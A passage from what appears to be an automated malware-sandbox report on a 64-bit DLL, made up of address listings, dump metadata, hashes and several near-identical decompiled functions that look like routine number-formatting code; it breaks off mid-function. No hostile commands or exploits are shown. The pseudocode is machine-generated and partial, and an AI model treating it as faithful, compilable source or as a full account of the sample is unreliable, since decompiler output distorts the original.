                                                                      0x18001ed7a
                                                                      0x18001ed80
                                                                      0x18001ed88
                                                                      0x18001eda2
                                                                      0x18001eda7
                                                                      0x18001edaf
                                                                      0x18001edb6
                                                                      0x18001edbc
                                                                      0x18001edc3
                                                                      0x18001edd0
                                                                      0x18001ede0
                                                                      0x18001ede7
                                                                      0x18001eded
                                                                      0x18001edf7
                                                                      0x18001ee01
                                                                      0x18001ee08
                                                                      0x18001ee0f
                                                                      0x18001ee15
                                                                      0x18001ee1a
                                                                      0x18001ee23
                                                                      0x18001ee2c
                                                                      0x18001ee32
                                                                      0x18001ee37
                                                                      0x18001ee3b
                                                                      0x18001ee3e
                                                                      0x18001ee45
                                                                      0x18001ee49
                                                                      0x18001ee54
                                                                      0x18001ee59
                                                                      0x18001ee5f
                                                                      0x18001ee66
                                                                      0x18001ee73
                                                                      0x18001ee83
                                                                      0x18001ee85
                                                                      0x18001ee89
                                                                      0x18001ee91
                                                                      0x18001eea1
                                                                      0x18001eea8
                                                                      0x18001eeb0
                                                                      0x18001eeb2
                                                                      0x18001eeb6
                                                                      0x18001eeba
                                                                      0x18001eec4
                                                                      0x18001eec9
                                                                      0x18001eece
                                                                      0x18001eed2
                                                                      0x18001eedf
                                                                      0x18001eee5
                                                                      0x18001eeee
                                                                      0x18001eef0
                                                                      0x18001eef8
                                                                      0x18001eefb
                                                                      0x18001ef14

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f26e779c1328d351d580ea123a1487e150580b4aa449c0e83f8079676e62bfc7
                                                                      • Instruction ID: 0976c4a73b781be45647b54aee5d7287503300e686f2e75dd0ab1dce49238460
                                                                      • Opcode Fuzzy Hash: f26e779c1328d351d580ea123a1487e150580b4aa449c0e83f8079676e62bfc7
                                                                      • Instruction Fuzzy Hash: D251A473600E9882E7AA8F28D5543AC2BA0E35AB98F158116FF46177D9CF31DE85C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001CF2C(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001d013;
                                                                      				if (_t110 == 0) goto 0x8001cf7c;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001d067;
                                                                      				if (_t111 == 0) goto 0x8001cfeb;
                                                                      				if (_t111 == 0) goto 0x8001cfc4;
                                                                      				if (_t111 == 0) goto 0x8001d067;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001d033;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001cfae;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001cfae;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d092;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d0a9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001cfe5;
                                                                      				goto 0x8001cf97;
                                                                      				goto 0x8001cf97;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001d00d;
                                                                      				goto 0x8001cf97;
                                                                      				goto 0x8001cf97;
                                                                      				if (_t118 == 0) goto 0x8001cf7c;
                                                                      				if (_t118 == 0) goto 0x8001cf7c;
                                                                      				if (_t118 == 0) goto 0x8001cf7c;
                                                                      				goto 0x8001cf6a;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001d0fc;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d08a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001cf97;
                                                                      				goto 0x8001cf97;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001d0b2;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001d0cc;
                                                                      				E00000001180021810(_t133, _t149);
                                                                      				goto 0x8001d0d3;
                                                                      				E00000001180020290( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001d0fa;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001d0ec;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001d0fa;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001cf2c
                                                                      0x18001cf31
                                                                      0x18001cf36
                                                                      0x18001cf40
                                                                      0x18001cf43
                                                                      0x18001cf46
                                                                      0x18001cf49
                                                                      0x18001cf4c
                                                                      0x18001cf52
                                                                      0x18001cf54
                                                                      0x18001cf56
                                                                      0x18001cf5f
                                                                      0x18001cf68
                                                                      0x18001cf6d
                                                                      0x18001cf76
                                                                      0x18001cf7c
                                                                      0x18001cf84
                                                                      0x18001cf9e
                                                                      0x18001cfa3
                                                                      0x18001cfab
                                                                      0x18001cfb2
                                                                      0x18001cfb8
                                                                      0x18001cfbf
                                                                      0x18001cfcc
                                                                      0x18001cfdc
                                                                      0x18001cfe3
                                                                      0x18001cfe9
                                                                      0x18001cff3
                                                                      0x18001cffd
                                                                      0x18001d004
                                                                      0x18001d00b
                                                                      0x18001d011
                                                                      0x18001d016
                                                                      0x18001d01f
                                                                      0x18001d028
                                                                      0x18001d02e
                                                                      0x18001d033
                                                                      0x18001d037
                                                                      0x18001d03a
                                                                      0x18001d041
                                                                      0x18001d045
                                                                      0x18001d050
                                                                      0x18001d055
                                                                      0x18001d05b
                                                                      0x18001d062
                                                                      0x18001d06f
                                                                      0x18001d07f
                                                                      0x18001d081
                                                                      0x18001d085
                                                                      0x18001d08d
                                                                      0x18001d09d
                                                                      0x18001d0a4
                                                                      0x18001d0ac
                                                                      0x18001d0ae
                                                                      0x18001d0b2
                                                                      0x18001d0b6
                                                                      0x18001d0c0
                                                                      0x18001d0c5
                                                                      0x18001d0ca
                                                                      0x18001d0ce
                                                                      0x18001d0db
                                                                      0x18001d0e1
                                                                      0x18001d0ea
                                                                      0x18001d0ec
                                                                      0x18001d0f4
                                                                      0x18001d0f7
                                                                      0x18001d110

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4298a62159fac09ebd01b71a931dbc2732877b2c0b4e5ce9af547f02137ebefe
                                                                      • Instruction ID: 103fbf33e8fdda31f616bee1c182d148fe13f3e2d32abbd614d7b636e4a8abb2
                                                                      • Opcode Fuzzy Hash: 4298a62159fac09ebd01b71a931dbc2732877b2c0b4e5ce9af547f02137ebefe
                                                                      • Instruction Fuzzy Hash: 6051B073604A5886E7AB8F28C0547AC37A1E35DB98F14811AFF4917799CF31CE8AC784
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001D114(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001d1fb;
                                                                      				if (_t110 == 0) goto 0x8001d164;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001d24f;
                                                                      				if (_t111 == 0) goto 0x8001d1d3;
                                                                      				if (_t111 == 0) goto 0x8001d1ac;
                                                                      				if (_t111 == 0) goto 0x8001d24f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001d21b;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d196;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d196;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d27a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d291;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d1cd;
                                                                      				goto 0x8001d17f;
                                                                      				goto 0x8001d17f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001d1f5;
                                                                      				goto 0x8001d17f;
                                                                      				goto 0x8001d17f;
                                                                      				if (_t118 == 0) goto 0x8001d164;
                                                                      				if (_t118 == 0) goto 0x8001d164;
                                                                      				if (_t118 == 0) goto 0x8001d164;
                                                                      				goto 0x8001d152;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001d2e4;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d272;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001d17f;
                                                                      				goto 0x8001d17f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001d29a;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001d2b4;
                                                                      				E000000011800218BC(_t133, _t149);
                                                                      				goto 0x8001d2bb;
                                                                      				E00000001180020338( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001d2e2;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001d2d4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001d2e2;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001d114
                                                                      0x18001d119
                                                                      0x18001d11e
                                                                      0x18001d128
                                                                      0x18001d12b
                                                                      0x18001d12e
                                                                      0x18001d131
                                                                      0x18001d134
                                                                      0x18001d13a
                                                                      0x18001d13c
                                                                      0x18001d13e
                                                                      0x18001d147
                                                                      0x18001d150
                                                                      0x18001d155
                                                                      0x18001d15e
                                                                      0x18001d164
                                                                      0x18001d16c
                                                                      0x18001d186
                                                                      0x18001d18b
                                                                      0x18001d193
                                                                      0x18001d19a
                                                                      0x18001d1a0
                                                                      0x18001d1a7
                                                                      0x18001d1b4
                                                                      0x18001d1c4
                                                                      0x18001d1cb
                                                                      0x18001d1d1
                                                                      0x18001d1db
                                                                      0x18001d1e5
                                                                      0x18001d1ec
                                                                      0x18001d1f3
                                                                      0x18001d1f9
                                                                      0x18001d1fe
                                                                      0x18001d207
                                                                      0x18001d210
                                                                      0x18001d216
                                                                      0x18001d21b
                                                                      0x18001d21f
                                                                      0x18001d222
                                                                      0x18001d229
                                                                      0x18001d22d
                                                                      0x18001d238
                                                                      0x18001d23d
                                                                      0x18001d243
                                                                      0x18001d24a
                                                                      0x18001d257
                                                                      0x18001d267
                                                                      0x18001d269
                                                                      0x18001d26d
                                                                      0x18001d275
                                                                      0x18001d285
                                                                      0x18001d28c
                                                                      0x18001d294
                                                                      0x18001d296
                                                                      0x18001d29a
                                                                      0x18001d29e
                                                                      0x18001d2a8
                                                                      0x18001d2ad
                                                                      0x18001d2b2
                                                                      0x18001d2b6
                                                                      0x18001d2c3
                                                                      0x18001d2c9
                                                                      0x18001d2d2
                                                                      0x18001d2d4
                                                                      0x18001d2dc
                                                                      0x18001d2df
                                                                      0x18001d2f8

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a9b58a57408ee68a80c25351368f3b4a6fe6158c0ea8c8905d7adbf4523bc158
                                                                      • Instruction ID: f5c14acb34b91717c8a5d43ee0115acbf6e369d43197767cd4a72c2837087e9a
                                                                      • Opcode Fuzzy Hash: a9b58a57408ee68a80c25351368f3b4a6fe6158c0ea8c8905d7adbf4523bc158
                                                                      • Instruction Fuzzy Hash: 2751B273204E5CA2E7AA8F28C1543AD37A1E369BD8F158116EF45177A8CF30DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001B310(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001b3f7;
                                                                      				if (_t110 == 0) goto 0x8001b360;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001b44b;
                                                                      				if (_t111 == 0) goto 0x8001b3cf;
                                                                      				if (_t111 == 0) goto 0x8001b3a8;
                                                                      				if (_t111 == 0) goto 0x8001b44b;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001b417;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b392;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b392;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b476;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001b48d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b3c9;
                                                                      				goto 0x8001b37b;
                                                                      				goto 0x8001b37b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001b3f1;
                                                                      				goto 0x8001b37b;
                                                                      				goto 0x8001b37b;
                                                                      				if (_t118 == 0) goto 0x8001b360;
                                                                      				if (_t118 == 0) goto 0x8001b360;
                                                                      				if (_t118 == 0) goto 0x8001b360;
                                                                      				goto 0x8001b34e;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001b4e0;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001b46e;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001b37b;
                                                                      				goto 0x8001b37b;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				_t51 = _t133 + 0x50; // 0x91
                                                                      				E0000000118001671C(_t133, _t51,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001b496;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001b4b0;
                                                                      				E000000011800210A0(0, _t133, _t149);
                                                                      				goto 0x8001b4b7;
                                                                      				E0000000118001FB28( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133);
                                                                      				if (0 == 0) goto 0x8001b4de;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001b4d0;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001b4de;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001b310
                                                                      0x18001b315
                                                                      0x18001b31a
                                                                      0x18001b324
                                                                      0x18001b327
                                                                      0x18001b32a
                                                                      0x18001b32d
                                                                      0x18001b330
                                                                      0x18001b336
                                                                      0x18001b338
                                                                      0x18001b33a
                                                                      0x18001b343
                                                                      0x18001b34c
                                                                      0x18001b351
                                                                      0x18001b35a
                                                                      0x18001b360
                                                                      0x18001b368
                                                                      0x18001b382
                                                                      0x18001b387
                                                                      0x18001b38f
                                                                      0x18001b396
                                                                      0x18001b39c
                                                                      0x18001b3a3
                                                                      0x18001b3b0
                                                                      0x18001b3c0
                                                                      0x18001b3c7
                                                                      0x18001b3cd
                                                                      0x18001b3d7
                                                                      0x18001b3e1
                                                                      0x18001b3e8
                                                                      0x18001b3ef
                                                                      0x18001b3f5
                                                                      0x18001b3fa
                                                                      0x18001b403
                                                                      0x18001b40c
                                                                      0x18001b412
                                                                      0x18001b417
                                                                      0x18001b41b
                                                                      0x18001b41e
                                                                      0x18001b425
                                                                      0x18001b429
                                                                      0x18001b434
                                                                      0x18001b439
                                                                      0x18001b43f
                                                                      0x18001b446
                                                                      0x18001b453
                                                                      0x18001b463
                                                                      0x18001b465
                                                                      0x18001b469
                                                                      0x18001b471
                                                                      0x18001b481
                                                                      0x18001b484
                                                                      0x18001b488
                                                                      0x18001b490
                                                                      0x18001b492
                                                                      0x18001b496
                                                                      0x18001b49a
                                                                      0x18001b4a4
                                                                      0x18001b4a9
                                                                      0x18001b4ae
                                                                      0x18001b4b2
                                                                      0x18001b4bf
                                                                      0x18001b4c5
                                                                      0x18001b4ce
                                                                      0x18001b4d0
                                                                      0x18001b4d8
                                                                      0x18001b4db
                                                                      0x18001b4f4

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a715aa4b1fa01e87fb2488215a2533adc049f6bc917bb87a0801bc631f1541a7
                                                                      • Instruction ID: e565c284493e7621083591c624e474ae9aa7564fa02d05cf5547407507ea4e5b
                                                                      • Opcode Fuzzy Hash: a715aa4b1fa01e87fb2488215a2533adc049f6bc917bb87a0801bc631f1541a7
                                                                      • Instruction Fuzzy Hash: DD51BF73604E5883E7AA8F28C1953AC37A4E759BD8F14C119EF46977A9CF20CE59C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001D528(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001d60f;
                                                                      				if (_t110 == 0) goto 0x8001d578;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001d663;
                                                                      				if (_t111 == 0) goto 0x8001d5e7;
                                                                      				if (_t111 == 0) goto 0x8001d5c0;
                                                                      				if (_t111 == 0) goto 0x8001d663;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001d62f;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d5aa;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d5aa;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d68e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d6a5;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d5e1;
                                                                      				goto 0x8001d593;
                                                                      				goto 0x8001d593;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001d609;
                                                                      				goto 0x8001d593;
                                                                      				goto 0x8001d593;
